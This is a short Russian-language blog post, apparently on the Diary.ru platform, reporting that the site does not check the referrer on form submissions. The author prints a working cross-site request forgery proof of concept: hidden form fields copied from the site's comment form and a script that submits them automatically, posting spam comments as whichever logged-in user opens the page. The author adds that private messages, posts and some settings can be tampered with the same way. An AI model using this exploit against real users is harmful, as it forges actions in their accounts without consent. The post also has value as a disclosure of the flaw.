и нафига я пошел в хакеры?

Мдя... урок на будущее: проверять откуда пришли данные в скрипты веб приложения. Когда ковырялся в настройках дневника в голову пришла довольно таки оригинальня мысль: что будет если залогиненый пользователь отошлет данные в правильном формате но НЕ СО СТРАНИЦЫ НАСТРОЕК СЕРВЕРА. результат сильно удивил. Оказывается Дайри вообще не проверяет referrer. Т.е. если пользователю дневников через "умыл" дать ссылку на страницу, незаметно отсылающую данные на сервер(с помощью скрипта), то можно делать мелкие пакости, как то спамить чужой дневник или менять некоторые параметры в дневнике. пример кода написаный на коленке:
(внаглую выдрал форму)
<input type="hidden" name="act" value="new_comment_post"/> <input type="hidden" name="module" value="journal"/> <input type="hidden" name="post_id" value="56164802"/> <input type="hidden" name="commentid" value=""/> <input type="hidden" name="referer" value=""/> <input type="hidden" name="action" value="dosend"/> <input type="hidden" name="page" value="last"/> <input type="hidden" name="write_from" value="0" id="fromMyself" checked/> <input type="hidden" name="message" id="message" value="текст которым спамить"> <input type="hidden" value="1" name="br_replace"/> <input type="hidden" name="subscribe" checked id="subscribeToComments" value=1/> <input type="hidden" name="no_smile" id="doNotSmile" value=1> <input type="hidden" id="addPicture" value="1" onclick="check_addPicture()"> <input type="file" size="30" name="attachment" style="width:520" /> <input type="submit" id="btSubmit" value="Отправить" tabindex="5" title="Отправить комментарий"/> <sсriрt>document.vbform.submit();</sсriрt> <-- скрипт автоматически отошлет форму.>

скрипт оставляет комментарий на этой странице

точно так же можно измываться над умыл, комментариям, записями частью настроек дневника. снять деньги или угнать акаунт не выйдет, требуется пасс.